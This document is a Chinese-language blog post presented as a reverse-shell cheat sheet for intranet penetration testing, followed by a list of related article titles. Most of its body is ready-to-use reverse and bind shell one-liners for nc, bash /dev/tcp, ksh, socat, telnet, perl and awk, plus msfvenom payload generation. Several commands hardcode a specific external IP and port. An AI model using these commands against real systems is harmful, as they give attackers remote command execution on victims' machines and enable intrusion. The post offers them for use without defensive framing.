大年初一,当然是更一篇重磅文章啦

反弹shell

/bin目录下带sh的都是shell

  • nc

    • 1.正向连接,目标机监听自身端口,攻击机主动建立连接

      • 目标机:nc -lvvp 端口 -e /bin/bash (-e cmd.exe)

        • 攻击机:nc -vv 目标IP 监听端口
      • 适用情况:目标机有独立外网ip,攻击机有无都行

    • 2.反向连接,攻击机监听自身端口,目标机主动建立连接

      • 攻击机:nc -lvvp 端口

        • 目标机:nc -vv 攻击机ip 端口 -e /bin/bash
      • 适用情况:攻击机有独立外网ip,目标机在内网,只有一个或多个映射端口

    • 3.聊天/传文件

      • 攻击机:nc -lvvp 端口 < 文件
      • 目标机:nc -vv 攻击机IP 攻击机端口 > 文件
    • 注意:有防火墙会连不上,得找放过的端口

  • bash

    • 攻击机监听:nc -lvvp 端口

      • 目标机:bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1

        • 把bash重定向
      • 使用kali下msfvenom生成payload

        • msfvenom -l payloads | grep bash #搜索payload制作命令
        • msfvenom -p cmd/unix/reverse_bash LHOST=攻击机IP LPORT=攻击机端口 #制作payload

          • 目标机运行payload:0<&209-;exec 209<>/dev/tcp/192.168.123.123/12345;sh <&209 >&209 2>&209
          • sh可换成任意一个bash或shell
        • 适用情况:bash -i 被屏蔽,以及nc没有 -e 参数

  • ksh/tsh/zsh/sh

    • 攻击机监听:nc -lvvp 端口
    • 目标机发送

      • ksh -c 'ksh > /dev/tcp/攻击机ip/端口 2>&1
  • socat

    命令最后加个&把进程放到后台
    jobs查看

    • TCP

      • 攻击机监听:socat TCP-LISTEN:端口 -
      • 目标机发送:

        • linux

          • socat exec:'bash -i',pty,stderr,setsid,sigint,sane tcp:攻击机ip:端口
        • windows

          • socat.exe exec:'cmd.exe',pty,stderr,setsid,sigint,sane tcp:攻击机ip:端口
    • UDP

      • 攻击机监听:socat udp-listen:端口 -
      • 目标机发送:

        • linux

          • socat udp-connect:攻击机ip:端口 exec:'bash -i',pty,stderr,sane 2>&1>/dev/null
        • windows

          • socat.exe udp-connect:攻击机ip:端口 exec:'cmd.exe',pty,stderr,sane
  • telnet

    • mknod backpipe p && telnet 攻击机ip 端口 0<backpipe | /bin/bash 1>backpipe
  • perl

    • 攻击机监听
    • 目标机发送

      • 输入msfvenom生成的payload

        • perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"155.94.164.131:10000");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
  • awk

    • 其他步骤一样,略

      • awk 'BEGIN{s="/inet/tcp/0/155.94.164.131/10000";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
  • ruby

    • 同上
  • python

    • 攻击机监听

      • nc -lvvp 端口
    • 目标机发送

      • 使用msfvenom生成payload
      • 输入payload
  • java

    • 同上
  • php

    • 生成payload保存到文件中
    • msfvenom -p php/reverse_php lhost=攻击机ip lport=端口 - f php -o /路径/shell.php

      • 复制到目标机运行
  • 使用msfvenom

    • msfvenom -l payloads | grep xxx #搜索可利用payload
    • msfvenom -p 要使用的payload生成脚本 lhost=攻击机ip lport=攻击机端口

内网渗透之跨边界传输 - 反弹shell的更多相关文章

  1. 内网渗透之跨边界传输 - LCX转发

    跨边界转发 端口转发 lcx 流程 目标机 ./lcx -slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx -listen 监听的端口 转发给攻击机访问 ...

  2. [源码]Python简易http服务器(内网渗透大文件传输含下载命令)

    Python简易http服务器源码 import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2 ...

  3. Linux内网渗透

    Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...

  4. metasploit渗透测试笔记(内网渗透篇)

    x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...

  5. Metasploit 内网渗透篇

    0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. ...

  6. 内网渗透之vlunstack靶场

    前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...

  7. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  8. 7.内网渗透之windows认证机制

    文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域 ...

  9. 3.内网渗透之reGeorg+Proxifier

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...

随机推荐

  1. QTP基本循环正常遍历(代码方式实现)

    0 环境 系统环境:win7 1 操作(正常遍历篇) 1.1 代码前看 systemutil.Run "D:\Program Files (x86)\HP\QuickTest Profess ...

  2. 压缩感知与稀疏模型——Convex Methods for Sparse Signal Recovery

    第三节课的内容.这节课上课到半截困了睡着了,看着大家都很积极请教认真听讲,感觉很惭愧.周末不能熬太晚.这个博客就记录一下醒着时候听到的内容. Motivation 目前的时代需要处理的数据量维度可能很 ...

  3. 查询AD中被锁定的账号并进行解锁

    1:查询AD中被锁定的账号: Search-ADAccount -LockedOut | export-csv -path c:\aaavvv.csv 2:解除锁定 Search-ADAccount ...

  4. confidence intervals and precision|The One-Mean z-Interval Procedure|When to Use the One-Mean z-Interval Procedure

    Confidence Intervals for One Population Mean When σ Is Known Obtaining Confidence Intervals for a Po ...

  5. Linux下rabitMq的部署(源码安装)

    简版yum安装:https://www.jianshu.com/p/46c22834aad5 一.环境安装 1,安装预环境 通过yum安装以下组件,运行命令: [root@rabbitmqserver ...

  6. Java中的注意点

    1.源文件以.java结束,源文件的基本组成部分是类(class) 2.每个源文件只能有一个public类,源文件名必须和该类的类名一致 3.每个Java程序的执行入口都是main()方法,固定写法为 ...

  7. CentOS-Samba服务安装与配置

    title date tags layout CentOS6.5 Samba服务安装与配置 2018-09-03 Centos6.5服务器搭建 post 例题: 在服务器中安装Samba服务,创建共享 ...

  8. tomcat部署项目方式

    三大部署方式1.   Context描述文件部署通过独立的Context文件描述清楚项目的访问路径和地址,tomcat在启动的时候会解析这个Context文件,创建一个Context对象. Conte ...

  9. Node.js知识点详解(一)基础部分

    转自:http://segmentfault.com/a/1190000000728401 模块 Node.js 提供了exports 和 require 两个对象,其中 exports 是模块公开的 ...

  10. 0-1背包问题-DP

    中文理解: 0-1背包问题:有一个贼在偷窃一家商店时,发现有n件物品,第i件物品价值vi元,重wi磅,此处vi与wi都是整数.他希望带走的东西越值钱越好,但他的背包中至多只能装下W磅的东西,W为一整数 ...